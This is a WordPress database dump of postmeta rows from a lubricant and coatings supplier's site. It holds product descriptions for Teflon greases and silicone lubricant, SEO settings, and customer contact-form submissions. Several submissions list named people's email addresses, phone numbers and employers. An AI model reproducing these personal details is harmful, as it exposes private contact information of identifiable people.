INSERT INTO `wp_postmeta` VALUES (27899, 3261, '_field_2', 'yolanda.r.gomez@lmco.com'); 
INSERT INTO `wp_postmeta` VALUES (27900, 3261, '_field_8', '(408) 756-1345'); 
INSERT INTO `wp_postmeta` VALUES (27901, 3261, '_field_3', 'Please send me in PDF form the MSDS for MS-222N\n\nthank you, '); 
INSERT INTO `wp_postmeta` VALUES (27902, 3261, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27903, 3261, '_sub_id', '3261'); 
INSERT INTO `wp_postmeta` VALUES (27904, 1673, '_wp_old_slug', 'ms-124h'); 
INSERT INTO `wp_postmeta` VALUES (27905, 1673, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (27906, 1673, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27907, 1673, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (27908, 1673, '_yoast_wpseo_focuskw_text_input', 'Connector Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (27909, 1673, '_yoast_wpseo_focuskw', 'Connector Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (27910, 1673, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27911, 1673, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27912, 1673, '_yoast_wpseo_linkdex', '95'); 
INSERT INTO `wp_postmeta` VALUES (27913, 3263, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27914, 3263, '_seq_num', '177'); 
INSERT INTO `wp_postmeta` VALUES (27915, 3263, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27916, 3263, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27917, 3263, '_field_1', 'Polly Sun'); 
INSERT INTO `wp_postmeta` VALUES (27918, 3263, '_field_10', 'flextronics'); 
INSERT INTO `wp_postmeta` VALUES (27919, 3263, '_field_2', 'Polly.Sun@flextronics.com'); 
INSERT INTO `wp_postmeta` VALUES (27920, 3263, '_field_8', '(866) 075-6518'); 
INSERT INTO `wp_postmeta` VALUES (27921, 3263, '_field_3', '高性能氟性润滑油	\r\n\r\n\r\n\r\n\r\n\r\n\r\nmiller - stephenson\r\n	GPL-203\r\n高性能氟性润滑油	\r\n\r\n\r\n\r\n\r\n\r\n\r\nmiller - stephenson\r\n	GPL-205\r\n'); 
INSERT INTO `wp_postmeta` VALUES (27922, 3263, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27923, 3263, '_sub_id', '3263'); 
INSERT INTO `wp_postmeta` VALUES (27924, 3264, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27925, 3264, '_seq_num', '178'); 
INSERT INTO `wp_postmeta` VALUES (27926, 3264, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27927, 3264, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27928, 3264, '_field_1', 'giulia bolasco'); 
INSERT INTO `wp_postmeta` VALUES (27929, 3264, '_field_10', 'embl'); 
INSERT INTO `wp_postmeta` VALUES (27930, 3264, '_field_2', 'giulia.bolasco@embl.it'); 
INSERT INTO `wp_postmeta` VALUES (27931, 3264, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (27932, 3264, '_field_3', 'Do you have a dealer for Europe? I would like to buy your product MS-907 Two-Part Epoxy Adhesive\r\nbest\r\ngiulia'); 
INSERT INTO `wp_postmeta` VALUES (27933, 3264, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27934, 3264, '_sub_id', '3264'); 
INSERT INTO `wp_postmeta` VALUES (27935, 3265, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27936, 3265, '_seq_num', '179'); 
INSERT INTO `wp_postmeta` VALUES (27937, 3265, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27938, 3265, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27939, 3265, '_field_1', 'laura'); 
INSERT INTO `wp_postmeta` VALUES (27940, 3265, '_field_10', 'circor aerospace'); 
INSERT INTO `wp_postmeta` VALUES (27941, 3265, '_field_2', 'Laura.Johnston@circor.com'); 
INSERT INTO `wp_postmeta` VALUES (27942, 3265, '_field_8', '(631) 863-4952'); 
INSERT INTO `wp_postmeta` VALUES (27943, 3265, '_field_3', 'I have MS-470c Urethane conformal coating. Near the bottom of the can it is stamp with DOT2Q    M5655. Is the M5655 the batch/lot number?  '); 
INSERT INTO `wp_postmeta` VALUES (27944, 3265, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27945, 3265, '_sub_id', '3265'); 
INSERT INTO `wp_postmeta` VALUES (27946, 1836, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (27947, 1836, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27948, 1836, '_yoast_wpseo_primary_product_cat', '262'); 
INSERT INTO `wp_postmeta` VALUES (27949, 1836, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27950, 1836, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27951, 1840, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (27952, 1840, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27953, 1730, '_wp_old_slug', 'penetrating-oil'); 
INSERT INTO `wp_postmeta` VALUES (27954, 1729, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (27955, 1729, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (27956, 1729, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (27957, 1729, '_yoast_wpseo_focuskw_text_input', 'Penetrating Oil'); 
INSERT INTO `wp_postmeta` VALUES (27958, 1729, '_yoast_wpseo_focuskw', 'Penetrating Oil'); 
INSERT INTO `wp_postmeta` VALUES (27959, 1729, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27960, 1729, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27961, 1729, '_yoast_wpseo_linkdex', '93'); 
INSERT INTO `wp_postmeta` VALUES (27962, 3268, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27963, 3268, '_seq_num', '180'); 
INSERT INTO `wp_postmeta` VALUES (27964, 3268, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27965, 3268, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27966, 3268, '_field_1', 'Albert Dupuy'); 
INSERT INTO `wp_postmeta` VALUES (27967, 3268, '_field_10', 'NBHX-Trim USA'); 
INSERT INTO `wp_postmeta` VALUES (27968, 3268, '_field_2', 'albert.dupuy@nbhx-trim.com'); 
INSERT INTO `wp_postmeta` VALUES (27969, 3268, '_field_8', '(616) 558-4068'); 
INSERT INTO `wp_postmeta` VALUES (27970, 3268, '_field_3', 'We inject clear polyurethane over wood trim parts at 90-100 C. We use a water base release agent and are seeing fisheye issues at a nearby spray machine. Do you have a release agent that has less affect on surface tension.'); 
INSERT INTO `wp_postmeta` VALUES (27971, 3268, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27972, 3268, '_sub_id', '3268'); 
INSERT INTO `wp_postmeta` VALUES (27973, 1842, 'U_S_C_options', 'a:1:{s:6:"logged";s:1:"1";}'); 
INSERT INTO `wp_postmeta` VALUES (27974, 1842, 'U_S_C_roles', 'a:8:{i:0;s:13:"Administrator";i:1;s:6:"Editor";i:2;s:6:"Author";i:3;s:11:"Contributor";i:4;s:10:"Subscriber";i:5;s:8:"Customer";i:6;s:12:"Shop Manager";i:7;s:5:"Agent";}'); 
INSERT INTO `wp_postmeta` VALUES (27975, 3269, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (27976, 3269, '_seq_num', '181'); 
INSERT INTO `wp_postmeta` VALUES (27977, 3269, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27978, 3269, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (27979, 3269, '_field_1', 'Kent Larsen'); 
INSERT INTO `wp_postmeta` VALUES (27980, 3269, '_field_10', 'Michigan Scientific Corp'); 
INSERT INTO `wp_postmeta` VALUES (27981, 3269, '_field_2', 'kdlarsen@michsci.com'); 
INSERT INTO `wp_postmeta` VALUES (27982, 3269, '_field_8', '(231) 547-5511'); 
INSERT INTO `wp_postmeta` VALUES (27983, 3269, '_field_3', 'MS-381HC information says it is in &quot;the proper concentration for connectors operating at room temperatures where the is little or no vibration.&quot; What do you recommend for circular connectors with gold plated contacts if there is vibration? What if there is vibration and the temperature is 100C?\r\nThanks,\r\nKent Larsen, Michigan Scientific Corp'); 
INSERT INTO `wp_postmeta` VALUES (27984, 3269, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (27985, 3269, '_sub_id', '3269'); 
INSERT INTO `wp_postmeta` VALUES (27986, 1368, '_edit_lock', '1482262954:2'); 
INSERT INTO `wp_postmeta` VALUES (27987, 1368, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (27988, 1368, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (27989, 1368, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (27990, 1368, '_oembed_f2db5e4a7aa1cebe2c6bdaf15caf5e78', '<blockquote data-secret="i7Xaplqz3m" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/">Fluoropolymer Medical Coatings</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/product/fluoropolymer-medical-coatings/embed/#?secret=i7Xaplqz3m" data-secret="i7Xaplqz3m" width="600" height="338" title="&#8220;Fluoropolymer Medical Coatings&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (27991, 1368, '_oembed_time_f2db5e4a7aa1cebe2c6bdaf15caf5e78', '1482263097'); 
INSERT INTO `wp_postmeta` VALUES (27992, 469, '_wc_rating_count', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (27993, 469, '_wc_average_rating', '0'); 
INSERT INTO `wp_postmeta` VALUES (27994, 3272, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (27995, 3272, '_seq_num', '181'); 
INSERT INTO `wp_postmeta` VALUES (27996, 3272, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (27997, 3272, '_field_12', 'Anna'); 
INSERT INTO `wp_postmeta` VALUES (27998, 3272, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (27999, 3272, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (28000, 3272, '_field_14', 'asdt1990@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (28001, 3272, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (28002, 3272, '_field_16', 'Hi, \r\n \r\nDoes the Ms-143xd has any apperance when coated?\r\nCan I recognize if a metal product coated with ms143xdif by its apps apearence?'); 
INSERT INTO `wp_postmeta` VALUES (28003, 3272, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (28004, 3272, '_sub_id', '3272'); 
INSERT INTO `wp_postmeta` VALUES (28005, 3273, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28006, 3273, '_seq_num', '182'); 
INSERT INTO `wp_postmeta` VALUES (28007, 3273, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28008, 3273, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28009, 3273, '_field_1', 'Anna'); 
INSERT INTO `wp_postmeta` VALUES (28010, 3273, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (28011, 3273, '_field_2', 'asdt1990@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (28012, 3273, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (28013, 3273, '_field_3', 'Can I recognize that aluminium plate was coated with ptfe release agent dry lubricant,  ms 143xd\r\nBy its appearance?'); 
INSERT INTO `wp_postmeta` VALUES (28014, 3273, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28015, 3273, '_sub_id', '3273'); 
INSERT INTO `wp_postmeta` VALUES (28016, 1097, '_wp_old_slug', 'the'); 
INSERT INTO `wp_postmeta` VALUES (28017, 1097, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28018, 1097, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28019, 1097, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28020, 1097, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_166416101.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28021, 1097, '_yoast_wpseo_twitter-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_166416101.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28022, 1097, '_yoast_wpseo_focuskw_text_input', 'Heavy Equipment Grease'); 
INSERT INTO `wp_postmeta` VALUES (28023, 1097, '_yoast_wpseo_focuskw', 'Heavy Equipment Grease'); 
INSERT INTO `wp_postmeta` VALUES (28024, 1097, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28025, 1097, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28026, 1097, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28027, 1097, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28028, 1097, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (28029, 1097, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28030, 1097, '_ywtm_content_tab_description', '<h3>Teflon Heavy Equipment Grease | Formulated for extreme conditions encountered in highway construction, farming, mining and trucking</h3>\r\nHeavy Equipment Grease with Teflon™ fluoropolymer is formulated to meet the extreme conditions encountered on off-highway construction equipment, as well as the demands of heavy equipment used in farming, mining and trucking. Formulated with high viscosity base oils, thickened with a lithium complex binder, and fortified with both molybdenum disulfide and Teflon™ fluoropolymer to deliver load carrying and anti-wear\r\nperformance.\r\n\r\nHeavy Equipment Grease with Teflon™ fluoropolymer contains a blend of extreme pressure and anti-wear additives, and rust and oxidation inhibitors for wet conditions. A dropping point of 500ºF (260ºC) ensures retention in high temperature applications. Recommended operating temperature range: -10ºF (-23ºC) to 350ºF (177ºC).\r\n\r\nNote: not recommended for automotive applications.\r\n\r\nFeatures:\r\n\r\n• Film strength &amp; mechanical stability\r\n• Protection against wear &amp; shock loads\r\n• Low water washout (5%)\r\n• Operating temperature range: -10ºF (-23ºC) to 350ºF (177ºC)\r\n• Contains 3% molybdenum\r\n• Meets NLGI #2\r\n\r\nDirections For Use:\r\nFor best results, remove old grease before applying.'); 
INSERT INTO `wp_postmeta` VALUES (28031, 1097, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28032, 1102, '_wp_old_slug', '1102'); 
INSERT INTO `wp_postmeta` VALUES (28033, 1102, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28034, 1102, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28035, 1102, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28036, 1102, '_yoast_wpseo_focuskw_text_input', 'High Temp Grease'); 
INSERT INTO `wp_postmeta` VALUES (28037, 1102, '_yoast_wpseo_focuskw', 'High Temp Grease'); 
INSERT INTO `wp_postmeta` VALUES (28038, 1102, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28039, 1102, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28040, 1102, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28041, 1102, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28042, 1102, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (28043, 1102, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28044, 1102, '_ywtm_content_tab_description', '<h3>Teflon High Temp Grease | Red synthetic blend extreme-pressure, high-speed grease</h3>\r\nHigh Temp Grease with Teflon™ fluoropolymer is a lithium complex, semisynthetic grease. This grease has a dropping point in excess of 500°F, which insures optimal retention in high temperature applications.  Formulated with carefully chosen additives, including Teflon™ fluoropolymer, to insure high film strength, and extreme pressure and anti-wear properties. Operating temperature range: -40ºF (-40°C) to 350ºF (177°C).\r\n\r\nSemi-synthetic base oils, combined with anti-oxidants and corrosion inhibitors enhance the performance in drum and high-temp disc brake wheel bearings, fifth wheels, chassis components, U-joints, king pins, clutch bearings, ball and roller bearings. Cross-over industrial uses include applications where lithium, lithium complex and extreme pressure greases are specified.\r\n\r\n<strong>Features</strong>\r\n\r\n• Film strength and durability\r\n• Withstands extreme pressure and heavy loads\r\n• Water washout (7%)\r\n• Extreme pressure and anti-wear properties\r\n• Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC)\r\n• Contains rust and corrosion inhibitors\r\n• Meets NLGI #2 Service Classification GC-LB (ASTM D-4950)'); 
INSERT INTO `wp_postmeta` VALUES (28045, 1102, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28046, 1102, '_yoast_wpseo_opengraph-image', 'https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_215450284.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28047, 1801, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28048, 1801, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28049, 1801, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28050, 1801, '_yoast_wpseo_focuskw_text_input', 'Teflon Multi-Use'); 
INSERT INTO `wp_postmeta` VALUES (28051, 1801, '_yoast_wpseo_focuskw', 'Teflon Multi-Use'); 
INSERT INTO `wp_postmeta` VALUES (28052, 1801, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28053, 1801, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28054, 1104, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28055, 1104, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28056, 1104, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28057, 1104, '_yoast_wpseo_focuskw_text_input', 'Severe Service Grease'); 
INSERT INTO `wp_postmeta` VALUES (28058, 1104, '_yoast_wpseo_focuskw', 'Severe Service Grease'); 
INSERT INTO `wp_postmeta` VALUES (28059, 1104, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28060, 1104, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28061, 1819, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28062, 1819, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28063, 1819, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28064, 1819, '_yoast_wpseo_focuskw_text_input', 'Teflon Silicone Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (28065, 1819, '_yoast_wpseo_focuskw', 'Teflon Silicone Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (28066, 1819, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (28067, 1819, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28068, 1819, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28069, 1819, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28070, 1819, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (28071, 1819, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28072, 1819, '_ywtm_content_tab_description', '<h3>Teflon Silicone Lubricant | Clean non-staining formula is safe for most plastic, rubber, vinyl, wood and metal</h3>\r\n<strong>Performance of Material</strong>\r\nOnce solvent carrier evaporates, the residual silicone coating will exhibit the following performance characteristics:\r\nViscosity at 25°C, approx. 350 mm/s\r\nFlash Point (closed cup), approx. &gt; 572°F (300°C)\r\nFreezing Point, approx. -58°F (-50°C)\r\nThermal Conductivity, approx. 0.16 W/m°C\r\nSurface Tension at 25°C, approx. 21.1 mN/m\r\nDielectric strength at 25°C, approx. 16 kV/mm\r\n\r\n<strong>Product Description</strong>\r\n\r\n• Performs in extreme temps from -40°F (-40°C) to 400°F (204°C).\r\n• Formulated with Teflon™ fluoropolymer to outperform other Silicone Sprays in both metal and non-metal applications.\r\n• Waterproofs, protects, lubricates and preserves rubber, plastic, vinyl, leather, metal &amp; wood. Seals out moisture.\r\n• Eliminates squeaking and binding in windows, conveyors, fan belts, hinges, locks, cables, etc. Good low tech mold release agent.\r\n• Helps prevent rust, oxidation and corrosion on all metals.\r\n• Helps prevent build up of glues, inks, paints, waxes, etc.\r\n• Protects O-rings, fishing gear, tools, and farm equipment from salt, chlorine and corrosives.\r\n• Prevents snow sticking and muddy buildups on shovels, snow plows, etc.\r\n• Clean, non-staining and odorless.\r\n• Good dielectric properties. Excellent lubricity.\r\n• Good resistance to high &amp; prolonged shear stress.\r\n• NSF H-2 Approved.\r\n\r\n<strong>Typical Applications of Teflon Silicone Lubricant:</strong>\r\n\r\n• Use on hinges, locks, latches, springs, plastic gears, rollers, drawer guides and other sliding parts. Conveyors, assemblies, heat sealers, cutting tables, slicing equipment, tools, dies, tuners, switches, fan belts &amp; rubber moldings. Waterproofs leather and protects vinyl.\r\n\r\n<strong>Directions For Use:</strong>\r\n\r\n1. Provide adequate ventilation. Do not use near open flames.\r\n2. Shake well before using.\r\n3. Either spray or brush on a light, even coat. Repeat for heavy-duty applications.\r\n\r\nNote: When waterproofing leather or sensitive materials test on an inconspicuous area.\r\nDo NOT use on floors or automotive pedals, MAY CAUSE SLIPPING OR FALLS.\r\n\r\n<strong>Properties of Material:</strong>\r\n\r\nBase Lubricant: Premium Grade Silicone Polymer, PTFE (Polytetrafluoroethylene)\r\nAppearance: Colorless, Odorless, Limpid Liquid\r\nFlash Point: Aerosol: 0°F (-18°C), Bulk Liquid: 15°F (-9°C)\r\nNFPA Flammability Rating: 3 (Highly Flammable)\r\n\r\n&nbsp;\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (28073, 1819, '_yoast_wpseo_linkdex', '91'); 
INSERT INTO `wp_postmeta` VALUES (28074, 1106, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28075, 1106, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28076, 1106, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28077, 1106, '_yoast_wpseo_focuskw_text_input', 'White Lithium Grease'); 
INSERT INTO `wp_postmeta` VALUES (28078, 1106, '_yoast_wpseo_focuskw', 'White Lithium Grease'); 
INSERT INTO `wp_postmeta` VALUES (28079, 1106, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (28080, 1106, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28081, 1106, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28082, 1106, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28083, 1106, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (28084, 1106, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28085, 1106, '_ywtm_content_tab_description', '<h3>Teflon White Lithium Grease | A clean, white general purpose grease for demanding applications</h3>\r\nWhite Lithium Grease with Teflon™ fluoropolymer is formulated with a special additive package which insures high film strength, extreme pressure (EP) and anti-wear properties as well as corrosion prevention. This is a clean, white, low odor grease, making it user friendly.\r\n\r\nThis general purpose grease provides long lasting protection in a broad range of applications and operating conditions. With a high dropping point in excess of 500°F, this grease ensures retention where high temperatures are encountered. Recommended Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC).\r\n\r\nUses include chassis, seat tracks, speedometer cables, trunk &amp; hood latches, door hinges, stop latches, assembly applications, garage doors, conveyor bearings, and more.\r\n\r\n<strong>Features:</strong>\r\n\r\n• Film strength and durability\r\n• Protection against oxidation &amp; corrosion\r\n• Water washout (7%)\r\n• Extreme pressure and anti-wear properties\r\n• Operating temperature range: -40ºF (-40ºC) to 350ºF (177ºC)\r\n• Meets NLGI #2'); 
INSERT INTO `wp_postmeta` VALUES (28086, 1106, '_yoast_wpseo_linkdex', '78'); 
INSERT INTO `wp_postmeta` VALUES (28087, 1643, '_wp_old_slug', 'tribosys-214x'); 
INSERT INTO `wp_postmeta` VALUES (28088, 1643, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28089, 1643, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28090, 1643, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28091, 1643, '_yoast_wpseo_focuskw_text_input', 'Gear Box Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (28092, 1643, '_yoast_wpseo_focuskw', 'Gear Box Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (28093, 1643, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (28094, 1643, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28095, 3282, '_wp_attached_file', '2016/09/shutterstock_537008896.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28096, 3282, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:665;s:4:"file";s:34:"2016/09/shutterstock_537008896.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_537008896-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_537008896-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_537008896-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_537008896-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_537008896-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_537008896-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_537008896-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (28097, 1644, '_wp_old_slug', 'tribosys-216x'); 
INSERT INTO `wp_postmeta` VALUES (28098, 1644, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28099, 1644, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28100, 1644, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (28101, 1644, '_yoast_wpseo_focuskw_text_input', 'Compressor Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (28102, 1644, '_yoast_wpseo_focuskw', 'Compressor Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (28103, 1644, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (28104, 1644, '_yoast_wpseo_focuskeywords', '[]'); 
